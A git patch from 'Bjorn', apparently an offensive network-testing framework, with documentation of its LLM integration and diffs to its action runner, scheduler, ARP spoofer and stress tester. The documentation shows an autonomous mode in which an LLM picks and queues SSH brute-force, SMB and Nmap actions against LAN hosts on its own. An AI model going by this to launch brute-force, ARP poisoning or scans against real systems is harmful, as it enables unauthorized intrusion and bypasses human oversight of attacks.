## 12. Startup (`Bjorn.py`)
|
||||
|
||||
```python
|
||||
# LLM Bridge — warm up singleton
|
||||
try:
|
||||
from llm_bridge import LLMBridge
|
||||
LLMBridge() # Starts mDNS discovery if llm_laruche_discovery=True
|
||||
logger.info("LLM Bridge initialised")
|
||||
except Exception as e:
|
||||
logger.warning("LLM Bridge init skipped: %s", e)
|
||||
|
||||
# MCP Server
|
||||
try:
|
||||
import mcp_server
|
||||
if shared_data.config.get("mcp_enabled", False):
|
||||
mcp_server.start() # Daemon thread "MCPServer"
|
||||
logger.info("MCP server started")
|
||||
else:
|
||||
logger.info("MCP server loaded (disabled)")
|
||||
except Exception as e:
|
||||
logger.warning("MCP server init skipped: %s", e)
|
||||
```
|
||||
|
||||
The LLM Orchestrator is initialised inside `orchestrator.py` (not `Bjorn.py`), since it depends on the orchestrator loop cycle.
|
||||
|
||||
---
|
||||
|
||||
## 13. LaRuche / LAND Protocol compatibility
|
||||
|
||||
### LAND Protocol
|
||||
|
||||
LAND (Local AI Network Discovery) is the LaRuche protocol:
|
||||
- **Discovery:** mDNS service type `_ai-inference._tcp.local.`
|
||||
- **Inference:** `POST http://[node]:8419/infer`
|
||||
|
||||
### What Bjorn implements on the Python side
|
||||
|
||||
```python
|
||||
# mDNS listening (zeroconf)
|
||||
from zeroconf import Zeroconf, ServiceBrowser
|
||||
ServiceBrowser(zc, "_ai-inference._tcp.local.", listener)
|
||||
# → Auto-detects LaRuche nodes
|
||||
|
||||
# Inference call (urllib stdlib, zero dependency)
|
||||
payload = {"prompt": "...", "capability": "llm", "max_tokens": 500}
|
||||
urllib.request.urlopen(f"{url}/infer", data=json.dumps(payload))
|
||||
```
|
||||
|
||||
### Scenarios
|
||||
|
||||
| Scenario | Behaviour |
|
||||
|----------|-----------|
|
||||
| LaRuche node detected on LAN | Used automatically as priority backend |
|
||||
| Multiple LaRuche nodes | First discovered is used |
|
||||
| Manual URL configured | Used directly, discovery ignored |
|
||||
| LaRuche node absent | Cascades to Ollama or external API |
|
||||
| `zeroconf` not installed | Discovery silently disabled, DEBUG log |
|
||||
|
||||
---
|
||||
|
||||
## 14. Optional dependencies
|
||||
|
||||
| Package | Min version | Feature unlocked | Install command |
|
||||
|---------|------------|------------------|----------------|
|
||||
| `mcp[cli]` | ≥ 1.0.0 | Full MCP server | `pip install "mcp[cli]"` |
|
||||
| `zeroconf` | ≥ 0.131.0 | LaRuche mDNS discovery | `pip install zeroconf` |
|
||||
|
||||
**No new dependencies** added for LLM backends:
|
||||
- **LaRuche / Ollama**: uses `urllib.request` (Python stdlib)
|
||||
- **Anthropic / OpenAI**: REST API via `urllib` — no SDK needed
|
||||
|
||||
---
|
||||
|
||||
## 15. Quick activation & configuration
|
||||
|
||||
### Basic LLM chat
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"llm_enabled": true, "llm_backend": "ollama", "llm_ollama_model": "phi3:mini"}'
|
||||
# → http://[bjorn-ip]:8000/chat.html
|
||||
```
|
||||
|
||||
### Chat with tool-calling (LLM accesses live network data)
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-d '{"llm_enabled": true, "llm_chat_tools_enabled": true}'
|
||||
```
|
||||
|
||||
### LLM Orchestrator — advisor mode
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-d '{
|
||||
"llm_enabled": true,
|
||||
"llm_orchestrator_mode": "advisor",
|
||||
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce"]
|
||||
}'
|
||||
```
|
||||
|
||||
### LLM Orchestrator — autonomous mode (LLM as sole planner)
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-d '{
|
||||
"llm_enabled": true,
|
||||
"llm_orchestrator_mode": "autonomous",
|
||||
"llm_orchestrator_skip_scheduler": true,
|
||||
"llm_orchestrator_max_actions": 5,
|
||||
"llm_orchestrator_interval_s": 120,
|
||||
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce", "SMBScan"],
|
||||
"llm_orchestrator_log_reasoning": true
|
||||
}'
|
||||
# → View reasoning: http://[bjorn-ip]:8000/chat.html → Orch Log button
|
||||
```
|
||||
|
||||
### With Anthropic API
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-d '{
|
||||
"llm_enabled": true,
|
||||
"llm_backend": "api",
|
||||
"llm_api_provider": "anthropic",
|
||||
"llm_api_key": "sk-ant-...",
|
||||
"llm_api_model": "claude-haiku-4-5-20251001"
|
||||
}'
|
||||
```
|
||||
|
||||
### With OpenRouter (access to all models)
|
||||
|
||||
```bash
|
||||
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
|
||||
-d '{
|
||||
"llm_enabled": true,
|
||||
"llm_backend": "api",
|
||||
"llm_api_provider": "openrouter",
|
||||
"llm_api_key": "sk-or-...",
|
||||
"llm_api_model": "meta-llama/llama-3.2-3b-instruct",
|
||||
"llm_api_base_url": "https://openrouter.ai/api"
|
||||
}'
|
||||
```
|
||||
|
||||
### Model recommendations by scenario
|
||||
|
||||
| Scenario | Backend | Recommended model | Pi RAM |
|
||||
|----------|---------|-------------------|--------|
|
||||
| Autonomous orchestrator + LaRuche on LAN | laruche | Mistral/Phi on the node | 0 (remote inference) |
|
||||
| Autonomous orchestrator offline | ollama | `qwen2.5:3b` | ~3 GB |
|
||||
| Autonomous orchestrator cloud | api | `claude-haiku-4-5-20251001` | 0 |
|
||||
| Chat + tools | ollama | `phi3:mini` | ~2 GB |
|
||||
| EPD comments only | ollama | `smollm2:360m` | ~400 MB |
|
||||
|
||||
---
|
||||
|
||||
## 16. Complete API endpoint reference
|
||||
|
||||
### GET
|
||||
|
||||
```
|
||||
GET /api/llm/status
|
||||
→ {"enabled": bool, "backend": str, "laruche_url": str|null,
|
||||
"laruche_discovery": bool, "ollama_url": str, "ollama_model": str,
|
||||
"api_provider": str, "api_model": str, "api_key_set": bool}
|
||||
|
||||
GET /api/llm/config
|
||||
→ {all llm_* keys except api_key, + "llm_api_key_set": bool}
|
||||
|
||||
GET /api/llm/reasoning
|
||||
→ {"status": "ok", "messages": [{"role": str, "content": str}, ...], "count": int}
|
||||
→ {"status": "error", "message": str, "messages": [], "count": 0}
|
||||
|
||||
GET /api/mcp/status
|
||||
→ {"enabled": bool, "running": bool, "transport": str,
|
||||
"port": int, "allowed_tools": [str]}
|
||||
```
|
||||
|
||||
### POST
|
||||
|
||||
```
|
||||
POST /api/llm/chat
|
||||
Body: {"message": str, "session_id": str?}
|
||||
→ {"status": "ok", "response": str, "session_id": str}
|
||||
→ {"status": "error", "message": str}
|
||||
|
||||
POST /api/llm/clear_history
|
||||
Body: {"session_id": str?}
|
||||
→ {"status": "ok"}
|
||||
|
||||
POST /api/llm/config
|
||||
Body: {any subset of llm_* and llm_orchestrator_* keys}
|
||||
→ {"status": "ok"}
|
||||
→ {"status": "error", "message": str}
|
||||
|
||||
POST /api/mcp/toggle
|
||||
Body: {"enabled": bool}
|
||||
→ {"status": "ok", "enabled": bool, "started": bool?}
|
||||
|
||||
POST /api/mcp/config
|
||||
Body: {"allowed_tools": [str]?, "port": int?, "transport": str?}
|
||||
→ {"status": "ok", "config": {...}}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 17. Queue priority system
|
||||
|
||||
```
|
||||
Priority Source Trigger
|
||||
──────────────────────────────────────────────────────────────
|
||||
85 LLM Advisor llm_orchestrator.advise()
|
||||
82 LLM Autonomous _run_autonomous_cycle() via run_action tool
|
||||
80 External MCP _impl_run_action() via MCP client or chat
|
||||
50 Normal / manual queue_action() without explicit priority
|
||||
40 Scheduler action_scheduler evaluates triggers
|
||||
```
|
||||
|
||||
The scheduler always processes the highest-priority pending item first. LLM and MCP actions therefore preempt scheduler actions.
|
||||
|
||||
---
|
||||
|
||||
## 18. Fallbacks & graceful degradation
|
||||
|
||||
| Condition | Behaviour |
|
||||
|-----------|-----------|
|
||||
| `llm_enabled = False` | `complete()` returns `None` immediately — zero overhead |
|
||||
| `llm_orchestrator_mode = "none"` | LLMOrchestrator not instantiated |
|
||||
| `mcp` not installed | `_build_mcp_server()` returns `None`, WARNING log |
|
||||
| `zeroconf` not installed | LaRuche discovery silently disabled, DEBUG log |
|
||||
| LaRuche node timeout | Exception caught, cascade to next backend |
|
||||
| Ollama not running | `URLError` caught, cascade to API |
|
||||
| API key missing | `_call_api()` returns `None`, cascade |
|
||||
| All backends fail | `complete()` returns `None` |
|
||||
| LLM returns `None` for EPD | `comment.py` uses `_pick_text()` (original behaviour) |
|
||||
| LLM advisor: invalid JSON | DEBUG log, returns `None`, next cycle |
|
||||
| LLM advisor: disallowed action | WARNING log, ignored |
|
||||
| LLM autonomous: no change | cycle skipped, zero API call |
|
||||
| LLM autonomous: ≥6 tool turns | returns partial text + warning |
|
||||
| Exception in LLM Bridge | `try/except` at every level, DEBUG log |
|
||||
|
||||
### Timeouts
|
||||
|
||||
```
|
||||
Chat / complete() → llm_timeout_s (default: 30s)
|
||||
EPD comments → 8s (hardcoded, short to avoid blocking render)
|
||||
Autonomous cycle → 90s (long: may chain multiple tool calls)
|
||||
Advisor → 20s (short prompt + JSON response)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 19. Call sequences
|
||||
|
||||
### Web chat with tool-calling
|
||||
|
||||
```
|
||||
Browser → POST /api/llm/chat {"message": "which hosts are vulnerable?"}
|
||||
└── LLMUtils.handle_chat(data)
|
||||
└── LLMBridge().chat(message, session_id)
|
||||
└── complete(messages, system, tools=_BJORN_TOOLS)
|
||||
└── _call_anthropic(messages, tools=[...])
|
||||
├── POST /v1/messages → stop_reason=tool_use
|
||||
│ └── tool: get_hosts(alive_only=true)
|
||||
│ → _execute_tool → _impl_get_hosts()
|
||||
│ → JSON of hosts
|
||||
├── POST /v1/messages [+ tool result] → end_turn
|
||||
└── returns "3 exposed SSH hosts: 192.168.1.10, ..."
|
||||
← {"status": "ok", "response": "3 exposed SSH hosts..."}
|
||||
```
|
||||
|
||||
### LLM autonomous cycle
|
||||
|
||||
```
|
||||
Thread "LLMOrchestrator" (daemon, interval=60s)
|
||||
└── _run_autonomous_cycle()
|
||||
├── fp = _compute_fingerprint() → (12, 3, 1, 47)
|
||||
├── _has_actionable_change(fp) → True (vuln_count 2→3)
|
||||
├── self._last_fingerprint = fp
|
||||
│
|
||||
└── LLMBridge().complete(prompt, system, tools=[read-only + run_action])
|
||||
└── _call_anthropic(tools=[...])
|
||||
├── POST → tool_use: get_hosts()
|
||||
│ → [{ip: "192.168.1.20", ports: "22,80,443"}]
|
||||
├── POST → tool_use: get_action_history()
|
||||
│ → [...]
|
||||
├── POST → tool_use: run_action("SSHBruteforce", "192.168.1.20")
|
||||
│ → _execute_tool → _impl_run_action()
|
||||
│ → db.queue_action(priority=82, trigger="llm_autonomous")
|
||||
│ → queue_event.set()
|
||||
└── POST → end_turn
|
||||
→ "Queued SSHBruteforce on 192.168.1.20 (Mjolnir strikes the unguarded gate)"
|
||||
→ [if log_reasoning=True] logger.info("[LLM_ORCH_REASONING]...")
|
||||
→ [if log_reasoning=True] _push_to_chat(bridge, prompt, response)
|
||||
```
|
||||
|
||||
### Reading reasoning from chat.html
|
||||
|
||||
```
|
||||
User clicks "Orch Log"
|
||||
└── fetch GET /api/llm/reasoning
|
||||
└── LLMUtils.get_llm_reasoning(handler)
|
||||
└── LLMBridge()._chat_histories["llm_orchestrator"]
|
||||
→ [{"role": "user", "content": "[Autonomous cycle]..."},
|
||||
{"role": "assistant", "content": "Queued SSHBruteforce..."}]
|
||||
← {"status": "ok", "messages": [...], "count": 2}
|
||||
→ Rendered as chat bubbles in #messages
|
||||
```
|
||||
|
||||
### MCP from external client (Claude Desktop)
|
||||
|
||||
```
|
||||
Claude Desktop → tool_call: run_action("NmapScan", "192.168.1.0/24")
|
||||
└── FastMCP dispatch
|
||||
└── mcp_server.run_action(action_name, target_ip)
|
||||
└── _impl_run_action()
|
||||
├── db.queue_action(priority=80, trigger="mcp")
|
||||
└── queue_event.set()
|
||||
← {"status": "queued", "action": "NmapScan", "target": "192.168.1.0/24", "priority": 80}
|
||||
```
|
||||
|
||||
### EPD comment with LLM
|
||||
|
||||
```
|
||||
display.py → CommentAI.get_comment("SSHBruteforce", params={...})
|
||||
└── delay elapsed OR status changed → proceed
|
||||
├── llm_comments_enabled = True ?
|
||||
│ └── LLMBridge().generate_comment("SSHBruteforce", params)
|
||||
│ └── complete([{role:user, content:"Status: SSHBruteforce..."}],
|
||||
│ max_tokens=80, timeout=8)
|
||||
│ ├── LaRuche → "Norse gods smell SSH credentials..." ✓
|
||||
│ └── [or timeout 8s] → None
|
||||
└── text = None → _pick_text("SSHBruteforce", lang, params)
|
||||
└── SELECT FROM comments WHERE status='SSHBruteforce'
|
||||
→ "Processing authentication attempts..."
|
||||
```
|
||||
121
action_runner.py
Normal file
121
action_runner.py
Normal file
@@ -0,0 +1,121 @@
|
||||
"""action_runner.py - Generic subprocess wrapper for running Bjorn actions from the web UI."""
|
||||
|
||||
import sys
|
||||
import os
|
||||
import signal
|
||||
import importlib
|
||||
import argparse
|
||||
import traceback
|
||||
|
||||
|
||||
def _inject_extra_args(shared_data, remaining):
|
||||
"""Parse leftover --key value pairs and set them as shared_data attributes."""
|
||||
i = 0
|
||||
while i < len(remaining):
|
||||
token = remaining[i]
|
||||
if token.startswith("--"):
|
||||
key = token[2:].replace("-", "_")
|
||||
if i + 1 < len(remaining) and not remaining[i + 1].startswith("--"):
|
||||
val = remaining[i + 1]
|
||||
# Auto-cast numeric values
|
||||
try:
|
||||
val = int(val)
|
||||
except ValueError:
|
||||
try:
|
||||
val = float(val)
|
||||
except ValueError:
|
||||
pass
|
||||
setattr(shared_data, key, val)
|
||||
i += 2
|
||||
else:
|
||||
setattr(shared_data, key, True)
|
||||
i += 1
|
||||
else:
|
||||
i += 1
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Bjorn Action Runner - bootstraps shared_data and calls action.execute()"
|
||||
)
|
||||
parser.add_argument("b_module", help="Action module name (e.g. ssh_bruteforce)")
|
||||
parser.add_argument("b_class", help="Action class name (e.g. SSHBruteforce)")
|
||||
parser.add_argument("--ip", default="", help="Target IP address")
|
||||
parser.add_argument("--port", default="", help="Target port")
|
||||
parser.add_argument("--mac", default="", help="Target MAC address")
|
||||
|
||||
args, remaining = parser.parse_known_args()
|
||||
|
||||
# Bootstrap shared_data (creates fresh DB conn, loads config)
|
||||
print(f"[runner] Loading shared_data for {args.b_class}...")
|
||||
from init_shared import shared_data
|
||||
|
||||
# Graceful shutdown on SIGTERM (user clicks Stop in the UI)
|
||||
def _sigterm(signum, frame):
|
||||
print("[runner] SIGTERM received, requesting graceful stop...")
|
||||
shared_data.orchestrator_should_exit = True
|
||||
|
||||
signal.signal(signal.SIGTERM, _sigterm)
|
||||
|
||||
# Inject extra CLI flags as shared_data attributes
|
||||
# e.g. --berserker-mode tcp -> shared_data.berserker_mode = "tcp"
|
||||
_inject_extra_args(shared_data, remaining)
|
||||
|
||||
# Dynamic import (custom/ paths use dots: actions.custom.my_script)
|
||||
module_path = f"actions.{args.b_module.replace('/', '.')}"
|
||||
print(f"[runner] Importing {module_path}...")
|
||||
module = importlib.import_module(module_path)
|
||||
action_class = getattr(module, args.b_class)
|
||||
|
||||
# Instantiate with shared_data (same as orchestrator)
|
||||
action_instance = action_class(shared_data)
|
||||
|
||||
# Resolve MAC from DB if not provided
|
||||
mac = args.mac
|
||||
if not mac and args.ip:
|
||||
try:
|
||||
rows = shared_data.db.query(
|
||||
"SELECT \"MAC Address\" FROM hosts WHERE IPs = ? LIMIT 1",
|
||||
(args.ip,)
|
||||
)
|
||||
if rows:
|
||||
mac = rows[0].get("MAC Address", "") or ""
|
||||
except Exception:
|
||||
mac = ""
|
||||
|
||||
# Build row dict (matches orchestrator.py:609-614)
|
||||
ip = args.ip or ""
|
||||
port = args.port or ""
|
||||
row = {
|
||||
"MAC Address": mac or "",
|
||||
"IPs": ip,
|
||||
"Ports": port,
|
||||
"Alive": 1,
|
||||
}
|
||||
|
||||
# Execute
|
||||
print(f"[runner] Executing {args.b_class} on {ip or 'global'}:{port}...")
|
||||
|
||||
if hasattr(action_instance, "scan") and not ip:
|
||||
# Global action (e.g. NetworkScanner)
|
||||
action_instance.scan()
|
||||
result = "success"
|
||||
else:
|
||||
if not ip:
|
||||
print(f"[runner] ERROR: {args.b_class} requires --ip but none provided")
|
||||
sys.exit(1)
|
||||
result = action_instance.execute(ip, port, row, args.b_class)
|
||||
|
||||
print(f"[runner] Finished with result: {result}")
|
||||
sys.exit(0 if result == "success" else 1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
print("\n[runner] Interrupted")
|
||||
sys.exit(130)
|
||||
except Exception:
|
||||
traceback.print_exc()
|
||||
sys.exit(2)
|
||||
@@ -1,18 +1,4 @@
|
||||
# action_scheduler.py testsdd
|
||||
# Smart Action Scheduler for Bjorn - queue-only implementation
|
||||
# Handles trigger evaluation, requirements checking, and queue management.
|
||||
#
|
||||
# Invariants we enforce:
|
||||
# - At most ONE "active" row per (action_name, mac_address, COALESCE(port,0))
|
||||
# where active ∈ {'scheduled','pending','running'}.
|
||||
# - Retries for failed entries are coordinated by cleanup_queue() (with backoff)
|
||||
# and never compete with trigger-based enqueues.
|
||||
#
|
||||
# Runtime knobs (from shared.py):
|
||||
# shared_data.retry_success_actions : bool (default False)
|
||||
# shared_data.retry_failed_actions : bool (default True)
|
||||
#
|
||||
# These take precedence over cooldown / rate-limit for NON-interval triggers.
|
||||
"""action_scheduler.py - Trigger evaluation, queue management, and dedup for scheduled actions."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
@@ -82,6 +68,9 @@ class ActionScheduler:
|
||||
self._last_cache_refresh = 0.0
|
||||
self._cache_ttl = 60.0 # seconds
|
||||
|
||||
# Lock for global action evaluation (must be created here, not lazily)
|
||||
self._globals_lock = threading.Lock()
|
||||
|
||||
# Memory for global actions
|
||||
self._last_global_runs: Dict[str, float] = {}
|
||||
# Actions Studio last source type
|
||||
@@ -133,19 +122,44 @@ class ActionScheduler:
|
||||
# Keep queue consistent with current enable/disable flags.
|
||||
self._cancel_queued_disabled_actions()
|
||||
|
||||
# 1) Promote scheduled actions that are due
|
||||
# 1) Promote scheduled actions that are due (always - queue hygiene)
|
||||
self._promote_scheduled_to_pending()
|
||||
|
||||
# 2) Publish next scheduled occurrences for interval actions
|
||||
self._publish_all_upcoming()
|
||||
# When LLM autonomous mode owns scheduling, skip trigger evaluation
|
||||
# so it doesn't compete with or duplicate LLM decisions.
|
||||
# BUT: if the queue is empty, the heuristic scheduler resumes as fallback
|
||||
# to prevent deadlock when the LLM fails to produce valid actions.
|
||||
_llm_wants_skip = bool(
|
||||
self.shared_data.config.get("llm_orchestrator_skip_scheduler", False)
|
||||
and self.shared_data.config.get("llm_orchestrator_mode") == "autonomous"
|
||||
and self.shared_data.config.get("llm_enabled", False)
|
||||
)
|
||||
_queue_empty = False
|
||||
if _llm_wants_skip:
|
||||
try:
|
||||
row = self.shared_data.db.query_one(
|
||||
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status IN ('pending','running','scheduled')"
|
||||
)
|
||||
_queue_empty = (row and int(row["cnt"]) == 0)
|
||||
except Exception:
|
||||
pass
|
||||
_llm_skip = _llm_wants_skip and not _queue_empty
|
||||
|
||||
# 3) Evaluate global on_start actions
|
||||
self._evaluate_global_actions()
|
||||
if not _llm_skip:
|
||||
if _llm_wants_skip and _queue_empty:
|
||||
logger.info("Scheduler: LLM queue empty - heuristic fallback active")
|
||||
# 2) Publish next scheduled occurrences for interval actions
|
||||
self._publish_all_upcoming()
|
||||
|
||||
# 4) Evaluate per-host triggers
|
||||
self.evaluate_all_triggers()
|
||||
# 3) Evaluate global on_start actions
|
||||
self._evaluate_global_actions()
|
||||
|
||||
# 5) Queue maintenance
|
||||
# 4) Evaluate per-host triggers
|
||||
self.evaluate_all_triggers()
|
||||
else:
|
||||
logger.debug("Scheduler: trigger evaluation skipped (LLM autonomous owns scheduling)")
|
||||
|
||||
# 5) Queue maintenance (always - starvation prevention + cleanup)
|
||||
self.cleanup_queue()
|
||||
self.update_priorities()
|
||||
|
||||
@@ -743,8 +757,6 @@ class ActionScheduler:
|
||||
|
||||
def _evaluate_global_actions(self):
|
||||
"""Evaluate and queue global actions with on_start trigger."""
|
||||
self._globals_lock = getattr(self, "_globals_lock", threading.Lock())
|
||||
|
||||
with self._globals_lock:
|
||||
try:
|
||||
for action in self._action_definitions.values():
|
||||
|
||||
@@ -1,14 +1,34 @@
|
||||
"""IDLE.py - No-op placeholder action for idle state."""
|
||||
|
||||
from shared import SharedData
|
||||
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
b_enabled = 0
|
||||
b_action = "normal"
|
||||
b_trigger = None
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_priority = 0
|
||||
b_timeout = 60
|
||||
b_cooldown = 0
|
||||
b_name = "IDLE"
|
||||
b_description = "No-op placeholder action representing idle state."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["idle", "placeholder"]
|
||||
b_category = "system"
|
||||
b_icon = "IDLE.png"
|
||||
|
||||
|
||||
class IDLE:
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
|
||||
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
"""No-op action. Always returns success."""
|
||||
return "success"
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
"""
|
||||
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
|
||||
"""arp_spoofer.py - Bidirectional ARP cache poisoning for MITM positioning.
|
||||
|
||||
Ethical cybersecurity lab action for Bjorn framework.
|
||||
Performs bidirectional ARP spoofing between a target host and the network
|
||||
gateway. Restores ARP tables on completion or interruption.
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port, row) for the target host.
|
||||
- Gateway IP is auto-detected from system routing table or shared config.
|
||||
- Results persisted to JSON output and logged for RL training.
|
||||
- Fully integrated with EPD display (progress, status, comments).
|
||||
Spoofs target<->gateway ARP entries; auto-restores tables on exit.
|
||||
"""
|
||||
|
||||
import os
|
||||
@@ -104,7 +95,7 @@ class ARPSpoof:
|
||||
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
|
||||
self._scapy_ok = True
|
||||
except ImportError:
|
||||
logger.error("scapy not available — ARPSpoof will not function")
|
||||
logger.error("scapy not available - ARPSpoof will not function")
|
||||
self._scapy_ok = False
|
||||
|
||||
# ─────────────────── Identity Cache ──────────────────────
|
||||
@@ -231,7 +222,7 @@ class ARPSpoof:
|
||||
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
|
||||
return "failed"
|
||||
if gateway_ip == ip:
|
||||
logger.warning(f"Target {ip} IS the gateway — skipping")
|
||||
logger.warning(f"Target {ip} IS the gateway - skipping")
|
||||
return "failed"
|
||||
|
||||
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
|
||||
@@ -252,7 +243,7 @@ class ARPSpoof:
|
||||
return "failed"
|
||||
|
||||
self.shared_data.bjorn_progress = "20%"
|
||||
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
logger.info(f"Resolved - target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
|
||||
|
||||
# 3) Spoofing loop
|
||||
@@ -263,7 +254,7 @@ class ARPSpoof:
|
||||
|
||||
while (time.time() - start_time) < duration:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit — stopping ARP spoof")
|
||||
logger.info("Orchestrator exit - stopping ARP spoof")
|
||||
break
|
||||
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
|
||||
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
|
||||
"""berserker_force.py - Rate-limited service stress testing with degradation analysis.
|
||||
|
||||
What it does:
|
||||
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
|
||||
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
|
||||
(scapy), HTTP probes (urllib), or mixed mode.
|
||||
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
|
||||
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
|
||||
|
||||
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
|
||||
target's response times change under light load. Max 50 req/s to stay RPi-safe.
|
||||
|
||||
Output is saved to data/output/stress/<ip>_<timestamp>.json
|
||||
Measures baseline response times, applies light load (max 50 req/s), then reports per-port degradation.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -115,8 +104,8 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/BerserkerForce.md"
|
||||
|
||||
# -------------------- Constants -----------------------------------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
|
||||
_DATA_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
OUTPUT_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
|
||||
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
|
||||
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
|
||||
@@ -428,15 +417,16 @@ class BerserkerForce:
|
||||
|
||||
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
|
||||
"""Write the JSON report and return the file path."""
|
||||
output_dir = os.path.join(self.shared_data.data_dir, "output", "stress")
|
||||
try:
|
||||
os.makedirs(OUTPUT_DIR, exist_ok=True)
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
except Exception as exc:
|
||||
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
|
||||
logger.warning(f"Could not create output dir {output_dir}: {exc}")
|
||||
|
||||
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
|
||||
safe_ip = ip.replace(":", "_").replace(".", "_")
|
||||
filename = f"{safe_ip}_{ts}.json"
|
||||
filepath = os.path.join(OUTPUT_DIR, filename)
|
||||
filepath = os.path.join(output_dir, filename)
|
||||
|
||||
report = {
|
||||
"tool": "berserker_force",
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
"""bruteforce_common.py - Shared helpers for all bruteforce actions (progress tracking, password generation)."""
|
||||
|
||||
import itertools
|
||||
import threading
|
||||
import time
|
||||
|
||||
0
actions/custom/__init__.py
Normal file
0
actions/custom/__init__.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
@@ -0,0 +1,105 @@
|
||||
"""example_bjorn_action.py - Custom action template using the Bjorn action format."""
|
||||
|
||||
import time
|
||||
import logging
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="example_bjorn_action", level=logging.DEBUG)
|
||||
|
||||
# ---- Bjorn action metadata (required for Bjorn format detection) ----
|
||||
b_class = "ExampleBjornAction"
|
||||
b_module = "custom/example_bjorn_action"
|
||||
b_name = "Example Bjorn Action"
|
||||
b_description = "Demo custom action with shared_data access and DB queries."
|
||||
b_author = "Bjorn Community"
|
||||
b_version = "1.0.0"
|
||||
b_action = "custom"
|
||||
b_enabled = 1
|
||||
b_priority = 50
|
||||
b_port = None
|
||||
b_service = None
|
||||
b_trigger = None
|
||||
b_parent = None
|
||||
b_cooldown = 0
|
||||
b_rate_limit = None
|
||||
b_tags = '["custom", "example", "template"]'
|
||||
|
||||
# ---- Argument schema (drives the web UI controls) ----
|
||||
b_args = {
|
||||
"target_ip": {
|
||||
"type": "text",
|
||||
"default": "192.168.1.1",
|
||||
"description": "Target IP address to probe"
|
||||
},
|
||||
"scan_count": {
|
||||
"type": "number",
|
||||
"default": 3,
|
||||
"min": 1,
|
||||
"max": 100,
|
||||
"description": "Number of probe iterations"
|
||||
},
|
||||
"verbose": {
|
||||
"type": "checkbox",
|
||||
"default": False,
|
||||
"description": "Enable verbose output"
|
||||
},
|
||||
"mode": {
|
||||
"type": "select",
|
||||
"choices": ["quick", "normal", "deep"],
|
||||
"default": "normal",
|
||||
"description": "Scan depth"
|
||||
}
|
||||
}
|
||||
|
||||
b_examples = [
|
||||
{"name": "Quick local scan", "args": {"target_ip": "192.168.1.1", "scan_count": 1, "mode": "quick"}},
|
||||
{"name": "Deep scan", "args": {"target_ip": "10.0.0.1", "scan_count": 10, "mode": "deep", "verbose": True}},
|
||||
]
|
||||
|
||||
|
||||
class ExampleBjornAction:
|
||||
"""Custom Bjorn action with full shared_data access."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
logger.info("ExampleBjornAction initialized")
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Main entry point called by action_runner / orchestrator.
|
||||
|
||||
Args:
|
||||
ip: Target IP address
|
||||
port: Target port (may be empty)
|
||||
